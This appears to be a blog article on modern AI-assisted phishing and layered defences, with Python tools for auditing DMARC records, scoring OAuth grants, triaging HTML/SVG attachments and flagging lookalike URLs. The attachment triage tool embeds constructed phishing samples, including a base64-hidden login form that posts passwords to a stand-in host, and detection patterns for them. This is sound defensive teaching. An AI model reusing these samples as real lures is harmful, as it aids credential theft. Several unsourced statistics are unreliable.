In the past year, phishing has evolved from clumsy, easy-to-detect mass spam into a sophisticated, targeted, AI-powered cyber weapon. From QR-code scams to voice deepfakes and AI-crafted emails that sound eerily authentic, phishing attacks have become smarter, faster, and far more dangerous.
But why is phishing suddenly everywhere, and what can organizations do to stay ahead of the curve and protect themselves?
- The Evolution of Deception.
In its early days, phishing was easy to spot: emails riddled with spelling mistakes, obviously suspicious links, and senders halfway across the globe. Today, attackers use Artificial Intelligence (AI) to generate messages in a genuine corporate tone of voice, pair them with spoofed cloud platforms, and slip past even vigilant employees.
Take the Microsoft 365 credential-theft campaign that surfaced this year. Attackers embedded fake login pages inside HTML attachments, so the login page travelled with the message and there was no hosted URL for a link filter to inspect, while the carrier emails looked like genuine Microsoft alerts and even referenced the recipient's department. Or the QR-code phishing trend, where employees scanned QR codes on printed posters or parking-lot flyers and unknowingly landed on credential-harvesting sites.
And then there's the deepfake voice scam in the UK, where a company lost over $240,000 after an employee took a phone call that sounded exactly like their CEO and instructed a "confidential transfer."
These aren't isolated incidents; they're signs of a phishing renaissance powered by artificial intelligence and human psychology.
Here is our analysis of what is driving the revival of phishing attacks:
- AI supercharged social engineering.
Security vendors, Microsoft among them, have observed attackers using LLMs to craft convincing, context-aware phishing emails and to obfuscate payloads, raising click rates and helping campaigns evade signature-based detection. The evidence so far is that AI-assisted lures convert markedly better, and slip past detection more often, than hand-written ones.
- New delivery techniques went mainstream.
QR-code phishing, smishing (SMS) and voice-based scams (vishing, including deepfake calls) all rose in prevalence, with large volumes of QR-linked phishing pages and millions of phishing artifacts observed every day.
- Better evasion & use of legitimate services.
Attackers embed malicious content inside legitimate file types (SVG images, HTML attachments), abuse OAuth consent flows, or host credential collection on real cloud services so the landing page carries a reputable domain and a valid certificate. Reports show rising rates of attacks that evade native email defences.
- Data leaks + Remote work = Richer targeting.
Large breaches and aggregated personal data make personalization trivial. Combine that with remote-first communication (heavy reliance on email and Slack, where a colleague is only ever a message away) and social engineering gets more effective.
The result? Phishing incidents reported across several industries, from finance and logistics to healthcare and education, are up 400% in the last 12 months.
None of these factors shows any sign of slowing; if anything, they will keep developing at a rapid pace as AI tooling matures.
Phishing is no longer about tricking the careless; it's about outsmarting the prepared.
- The New Defence Mindset.
To fight modern phishing, organizations must move beyond just “awareness training.” The new approach combines technology, behaviour, and culture.
Building the Foundation.
- Make credentials useless
Replace passwords with phishing-resistant MFA such as FIDO2 security keys or passkeys. These bind the credential to the legitimate site's origin, so a fake login page cannot obtain anything replayable, whereas one-time codes and push approvals can still be relayed in real time by a proxy phishing kit. When a global tech company rolled this out company-wide, it saw a 92% drop in account-takeover attempts, because even if someone clicked a fake link, the attacker couldn't get in.
- Harden email & identity posture
Protect your digital front door. Publish SPF, DKIM and DMARC records and move DMARC to an enforcing policy (p=quarantine, then p=reject) so receivers discard mail that spoofs your domain; a p=none record only reports. Enable Safe Links or time-of-click URL scanning to catch links that turn malicious after delivery. Note that DMARC protects your own domain from being forged; it does nothing against lookalike domains or mail sent from compromised legitimate accounts.
A regional bank in Southeast Asia reduced email-based phishing by nearly half after implementing DMARC and real-time URL scanning.
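To make the enforcement point concrete, here is an added example (not code from the article) that audits SPF and DMARC records the way a mail admin would before trusting a domain. The TXT records for `example.com` and `hardened.example` are constructed so it runs offline; in production you would resolve the `<domain>` and `_dmarc.<domain>` TXT records with dnspython or `dig` and pass them in the same way.

```python
"""Audit a domain's SPF and DMARC posture (added example, not from the article).

The TXT records below are constructed so the check runs offline. In production,
resolve `<domain>` and `_dmarc.<domain>` TXT records (dnspython, or `dig TXT`)
and pass the results to audit_domain() the same way.
"""
import re

# Constructed sample records for two hypothetical domains.
SAMPLE_RECORDS = {
    # Monitoring-only posture: common after a first DMARC rollout and easy to forget.
    "example.com": "v=spf1 include:_spf.example-mail.net ip4:203.0.113.0/24 ~all",
    "_dmarc.example.com": "v=DMARC1; p=none; rua=mailto:dmarc@example.com; pct=100",
    # Enforcing posture.
    "hardened.example": "v=spf1 include:_spf.example-mail.net -all",
    "_dmarc.hardened.example": (
        "v=DMARC1; p=reject; sp=reject; adkim=s; aspf=s; "
        "rua=mailto:dmarc@hardened.example"
    ),
}


def parse_dmarc(record: str) -> dict:
    """Split a DMARC record into lower-cased tag -> value pairs."""
    tags = {}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    return tags


def spf_terminal_qualifier(spf: str):
    """Return the qualifier on the `all` mechanism ('+', '-', '~', '?'), or None if
    there is none. A bare `all` means `+all`."""
    for token in spf.split():
        match = re.fullmatch(r"([+\-~?]?)all", token, re.IGNORECASE)
        if match:
            return match.group(1) or "+"
    return None


def audit_domain(domain: str, records: dict) -> list:
    """Return the findings a mail admin should fix before trusting this domain's mail."""
    findings = []
    spf = records.get(domain, "")
    dmarc = records.get(f"_dmarc.{domain}")

    if not spf.lower().startswith("v=spf1"):
        findings.append("no SPF record")
    else:
        qualifier = spf_terminal_qualifier(spf)
        if qualifier == "+":
            findings.append("SPF +all: any host may send as this domain")
        elif qualifier in ("~", "?"):
            findings.append(f"SPF {qualifier}all: soft/neutral result, receivers rarely reject")
        elif qualifier is None:
            findings.append("SPF has no terminal `all` mechanism")

    if dmarc is None:
        findings.append("no DMARC record: receivers have no policy for spoofed mail")
        return findings
    tags = parse_dmarc(dmarc)
    policy = tags.get("p", "none").lower()
    if policy == "none":
        findings.append("DMARC p=none only monitors; spoofed mail is still delivered")
    elif policy == "quarantine":
        findings.append("DMARC p=quarantine: move to p=reject once reports are clean")
    pct = int(tags.get("pct", "100"))
    if pct < 100:
        findings.append(f"DMARC pct={pct}: policy applies to only {pct}% of failing mail")
    if "rua" not in tags:
        findings.append("no rua address: you will never see who is spoofing you")
    if policy != "none" and tags.get("sp", policy).lower() == "none":
        findings.append("sp=none leaves subdomains spoofable")
    return findings


if __name__ == "__main__":
    for name in ("example.com", "hardened.example"):
        print(name, audit_domain(name, SAMPLE_RECORDS) or ["OK"])
```

Run against the constructed records, `example.com` comes back with two findings (SPF softfail and DMARC p=none) and `hardened.example` with none. The same checks apply to every domain you send from, including marketing and transactional subdomains, which is what the `sp` check is for.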
- Apply least privilege + conditional access
Not everyone needs admin rights. Limit access to critical systems and require extra verification for logins from unusual devices or locations.
For example, a Singapore-based manufacturing firm now blocks risky sign-ins from outside APAC, cutting down unauthorized access attempts overnight.
- Audit third-party app connections
Attackers often sneak in through connected apps: a consent-phishing lure asks the user to grant an attacker-controlled app permission to read mail or files, and because the grant is a token rather than a login, it survives password resets and MFA. Review OAuth consents monthly and remove outdated or unnecessary app permissions.
One logistics company discovered 60+ unused third-party integrations, some of which still had data access. Cleaning them up closed a silent backdoor.
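The monthly review above is easier when the grants are scored rather than eyeballed. The following is an added example, not from the article or any vendor, that ranks consent grants by the damage a leaked token could do (write or send scopes, refresh tokens, unverified publishers, months of inactivity, user-only consent). The grants and the scope weights are constructed; scope names follow Microsoft Graph conventions but are treated as plain strings.

```python
"""Prioritise OAuth app consents for review (added example, not from the article).

The grants below are constructed. A real review would export them from the
identity provider (e.g. Entra ID's service principals and permission grants)
and feed the same records to audit_grants().
"""
from datetime import date

# Weight per scope: how much damage a token with this permission can do without
# the user ever signing in again. Unknown scopes get a weight of 1.
SCOPE_WEIGHTS = {
    "openid": 0, "profile": 0, "email": 0, "User.Read": 0,
    "offline_access": 2,           # refresh token: access outlives the session
    "Mail.Read": 3, "Files.Read.All": 3,
    "Mail.ReadWrite": 5, "Mail.Send": 5, "Files.ReadWrite.All": 5,
    "Directory.ReadWrite.All": 6,
}
WRITE_THRESHOLD = 5   # scopes at or above this can exfiltrate or send as the user
STALE_DAYS = 90
AUDIT_DATE = date(2024, 11, 1)   # constructed "today" for the sample run

# Constructed sample grants.
SAMPLE_GRANTS = [
    {"app": "Quarterly Expense Bot", "publisher_verified": False, "consent": "user",
     "scopes": ["Mail.ReadWrite", "offline_access", "User.Read"], "last_used": date(2024, 1, 10)},
    {"app": "Corp Calendar Sync", "publisher_verified": True, "consent": "admin",
     "scopes": ["Calendars.Read", "User.Read"], "last_used": date(2024, 10, 30)},
    {"app": "Mail Digest", "publisher_verified": True, "consent": "user",
     "scopes": ["Mail.Read", "offline_access"], "last_used": date(2024, 10, 25)},
]


def score_grant(grant: dict, today: date) -> dict:
    """Score one consent grant and recommend keep / review / revoke, with reasons."""
    reasons = []
    score = sum(SCOPE_WEIGHTS.get(s, 1) for s in grant["scopes"])
    if any(SCOPE_WEIGHTS.get(s, 1) >= WRITE_THRESHOLD for s in grant["scopes"]):
        reasons.append("write or send access to mail, files or directory")
    if "offline_access" in grant["scopes"]:
        reasons.append("holds a refresh token: access persists after the user logs out")
    if not grant["publisher_verified"]:
        score += 3
        reasons.append("unverified publisher")
    idle_days = (today - grant["last_used"]).days
    if idle_days > STALE_DAYS:
        score += 2
        reasons.append(f"unused for {idle_days} days")
    if grant["consent"] == "user":
        score += 2
        reasons.append("user consent: never reviewed by an admin")

    if idle_days > STALE_DAYS and score >= 8:
        action = "revoke"          # risky and nobody is using it: remove it
    elif score >= 6:
        action = "review"          # risky but in use: confirm the owner still needs it
    else:
        action = "keep"
    return {"app": grant["app"], "score": score, "action": action, "reasons": reasons}


def audit_grants(grants: list, today: date) -> list:
    """Return all grants scored, riskiest first."""
    return sorted((score_grant(g, today) for g in grants), key=lambda r: -r["score"])


if __name__ == "__main__":
    for row in audit_grants(SAMPLE_GRANTS, AUDIT_DATE):
        print(f'{row["action"]:6} {row["score"]:>3}  {row["app"]}: {"; ".join(row["reasons"])}')
```

On the sample data the unverified, idle expense bot with Mail.ReadWrite and a refresh token lands at the top as "revoke", the in-use mail digest is "review" because a user granted it standing read access, and the admin-approved calendar sync is "keep". The thresholds are deliberately simple; the point is that idle time plus write scope is the combination that deserves automatic revocation.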
Detection & prevention.
- Inspect what you can’t see
Detonate every attachment in a sandbox before delivery, including "safe-looking" file types like HTML, SVG and PDF. An SVG is an XML document that can carry script, and an HTML attachment can render a complete login page locally, so neither presents a URL for a link filter to catch.
Recently, a retailer caught an AI-obfuscated phishing file disguised as an invoice, thanks to sandbox detonation tools.
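As an added illustration of what "inspect what you can't see" means for these file types (this is example code written for this page, not the retailer's tooling or any product's detection logic), the block below statically triages an HTML or SVG attachment body, decodes any base64 blob large enough to hide markup, and scores the hidden content more heavily than what is visible. The three attachment bodies are constructed, as are the indicator weights.

```python
"""Static triage of HTML/SVG attachments, including base64-hidden content
(added example, not from the article).

Heuristic scoring, not a sandbox replacement: it shows the kind of indicators a
detonation or static-analysis stage should surface. The samples are constructed.
"""
import base64
import binascii
import re

# (name, pattern, weight): markup features that have no business in an invoice
# or a logo but are the building blocks of an attachment-borne login page.
INDICATORS = [
    ("script",            re.compile(r"<script\b", re.I), 3),
    ("event_handler",     re.compile(r"\bon(load|error|click|mouseover)\s*=", re.I), 2),
    ("js_decode",         re.compile(r"\b(atob|unescape|eval|String\.fromCharCode)\s*\(", re.I), 3),
    ("redirect",          re.compile(r"(window\.)?location(\.href|\.replace)?\s*[=(]"
                                     r"|http-equiv\s*=\s*[\"']?refresh", re.I), 3),
    ("password_field",    re.compile(r"<input[^>]*type\s*=\s*[\"']?password", re.I), 4),
    ("offsite_form_post", re.compile(r"<form[^>]*action\s*=\s*[\"']?https?://", re.I), 2),
    ("svg_foreignobject", re.compile(r"<foreignObject\b", re.I), 2),
    ("data_uri",          re.compile(r"data:[\w/+.-]+;base64,", re.I), 1),
]
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def decode_blobs(text: str):
    """Yield the decoded text of every base64 blob long enough to hide markup."""
    for match in B64_BLOB.finditer(text):
        blob = match.group(0)
        try:
            raw = base64.b64decode(blob + "=" * (-len(blob) % 4))
        except (ValueError, binascii.Error):
            continue
        decoded = raw.decode("utf-8", errors="ignore")
        if decoded.strip():
            yield decoded


def triage(content: str, depth: int = 0) -> dict:
    """Score an attachment body; recurse one level into base64 payloads."""
    hits = {}
    for name, pattern, weight in INDICATORS:
        if pattern.search(content):
            hits[name] = weight
    if depth == 0:
        for decoded in decode_blobs(content):
            for name, weight in triage(decoded, depth=1)["hits"].items():
                hits[f"decoded:{name}"] = weight + 1   # hidden behind encoding: weigh it more
    score = sum(hits.values())
    verdict = "block" if score >= 6 else "review" if score >= 3 else "allow"
    return {"score": score, "verdict": verdict, "hits": hits}


# Constructed samples (not real campaign artifacts).
BENIGN_SVG = ('<svg xmlns="http://www.w3.org/2000/svg" width="64" height="64">'
              '<circle cx="32" cy="32" r="30" fill="#0a7"/></svg>')
HIDDEN_PAGE = ('<html><body><form action="https://login-verify.example/collect" method="post">'
               'Session expired. <input type="password" name="pw"></form></body></html>')
PHISH_SVG = ('<svg xmlns="http://www.w3.org/2000/svg"><script>document.write(atob("'
             + base64.b64encode(HIDDEN_PAGE.encode()).decode() + '"))</script></svg>')
PHISH_HTML = ('<html><head><meta http-equiv="refresh" content="0;url=https://m365-verify.example/">'
              '</head><body>Redirecting to your invoice...</body></html>')

if __name__ == "__main__":
    for label, body in (("logo.svg", BENIGN_SVG), ("invoice.svg", PHISH_SVG), ("invoice.html", PHISH_HTML)):
        print(label, triage(body))
```

The "invoice.svg" sample contains no visible form at all; the login page only appears after the base64 inside `atob()` is decoded, which is exactly what a filter that looks at the raw bytes misses. A redirect-only HTML file scores "review" rather than "block", since a sandbox that follows the redirect is the right place to make the final call.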
- Double up on link scanning
Combine your provider's filters with multi-engine URL reputation tools. This helps detect newly registered phishing domains that slip past built-in email filters, though reputation lags registration: a domain created hours before the campaign has no history yet, so pair reputation lookups with domain-age and lookalike checks.
- Beware of QR-code traps
Phishing via QR codes (also known as "quishing") is now a major trend. In one global campaign, employees were tricked into scanning fake parking vouchers that led to credential-harvesting pages. A QR code moves the click onto a personal phone, outside the email gateway and often outside endpoint protection, which is exactly why attackers favour it.
To counter these traps, deploy QR-scan warnings or automatic checks that flag suspicious redirects before users enter their details, and run the URL decoded from a QR image through the same link scanning as any other URL.
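Whether a URL arrives as an email link or is decoded from a QR code, the same triage applies. The following is an added example written for this page (not from the article or any product) of the offline part of that check: unwrap URL-in-parameter redirects, then test the landing domain against an allow-list for brand-as-subdomain abuse, punycode, homoglyph swaps such as `rn` for `m`, and small edit distances. `TRUSTED`, the redirect parameter names and the sample URLs are all constructed assumptions; a real deployment would add domain-age and reputation lookups.

```python
"""Triage a URL from an email link or a decoded QR code before anyone clicks it
(added example, not from the article).

No network calls: the check unwraps URL-in-parameter redirects, then compares the
landing domain against a trusted list for brand-as-subdomain, homoglyph and
edit-distance lookalikes. Domain list and sample URLs are constructed.
"""
from urllib.parse import parse_qs, unquote, urlparse

TRUSTED = {"microsoft.com", "office.com", "example.com"}   # assumed allow-list
REDIRECT_PARAMS = {"url", "redirect", "redirect_uri", "next", "u", "continue", "target", "dest"}
HOMOGLYPHS = (("rn", "m"), ("vv", "w"), ("cl", "d"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s"))


def registrable_domain(host: str) -> str:
    """Crude eTLD+1 (last two labels); use the public suffix list (tldextract) in production."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def unwrap_redirects(url: str, max_hops: int = 3) -> list:
    """Follow open-redirect style parameters (?url=https://...) and return the whole chain."""
    chain = [url]
    for _ in range(max_hops):
        query = parse_qs(urlparse(chain[-1]).query)
        hop = None
        for key, values in query.items():
            candidate = unquote(values[0])          # parse_qs decoded once; this handles double-encoding
            if key.lower() in REDIRECT_PARAMS and candidate.lower().startswith(("http://", "https://")):
                hop = candidate
                break
        if hop is None:
            break
        chain.append(hop)
    return chain


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def normalize_homoglyphs(s: str) -> str:
    """Collapse common look-alike character sequences so `rnicrosoft` compares as `microsoft`."""
    for src, dst in HOMOGLYPHS:
        s = s.replace(src, dst)
    return s


def assess_url(url: str, trusted: set = TRUSTED) -> dict:
    """Return the final URL after redirect unwrapping, a verdict and the findings behind it."""
    chain = unwrap_redirects(url)
    final = urlparse(chain[-1])
    host = (final.hostname or "").lower()
    reg = registrable_domain(host)
    high, low = [], []
    if len(chain) > 1:
        low.append(f"redirect chain through {urlparse(chain[0]).hostname}")
    if final.scheme != "https":
        low.append("not https")
    if "xn--" in host:
        high.append("punycode (IDN) host")
    if reg in trusted:
        verdict = "trusted"
    else:
        labels = host.split(".")
        for t in sorted(trusted):
            brand = t.split(".")[0]
            if any(brand in lbl for lbl in labels[:-2]):
                high.append(f"{brand} used as a subdomain label of {reg}")
            if reg != t and (normalize_homoglyphs(reg) == t or edit_distance(reg, t) <= 2):
                high.append(f"lookalike of {t}")
        verdict = "block" if high else "review" if low else "unknown"
    return {"final_url": chain[-1], "verdict": verdict, "findings": high + low}


# Constructed samples: a QR "parking voucher" link, a real sign-in URL, a homoglyph
# domain, an open redirect on a trusted host, and an ordinary unknown site.
SAMPLE_URLS = [
    "https://t.example-redirect.net/r?u=https%3A%2F%2Fmicrosoft.com.login-verify.example%2Fparking",
    "https://login.microsoft.com/common/oauth2/authorize",
    "http://rnicrosoft.com/login",
    "https://login.microsoft.com/redirect?url=https://evil-cdn.example/x",
    "https://news.somepublisher.example/article",
]

if __name__ == "__main__":
    for u in SAMPLE_URLS:
        result = assess_url(u)
        print(f'{result["verdict"]:8} {result["final_url"]}  {result["findings"]}')
```

The first sample is the QR-voucher pattern: a shortener-style host whose `u=` parameter carries the real destination, where a trusted brand appears only as a subdomain of an unrelated domain. The fourth shows the opposite failure, an open redirect on a trusted host, which is why the verdict is based on the final URL in the chain rather than the one the user sees.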
People & process.
- Keep training real and continuous
Forget once-a-year workshops. Run monthly phishing simulations that reflect real threats: AI-generated messages, SMS lures, even fake calendar invites.
A Singaporean SME saw employee reporting rates jump 40% after shifting to regular, scenario-based simulations.
- Coach in the moment
When someone clicks a phishing link, turn it into a teachable moment.
Show a short, just-in-time micro-lesson explaining what went wrong.
These bite-sized reminders build long-term habits far better than generic training modules.
- Prepare executive & vendor playbooks
Executives are prime targets — and a CEO scam can hit both wallets and headlines.
Create a one-page crisis playbook covering who to alert (IT, comms, legal), what to say publicly, and how to lock accounts immediately.
One regional firm avoided major PR fallout after a CEO-impersonation attempt because they rehearsed their incident plan in advance.
- The Bottom Line
Phishing isn't going away; it's growing faster than ever.
Attackers are smarter, tools are cheaper, and human curiosity will always be exploitable. But with the right balance of modern authentication, layered email security, continuous awareness, and rapid response, organizations can stay vigilant and be ready when an attack gets through.
Phishing thrives on fear and distraction, but resilience is always built on awareness and readiness.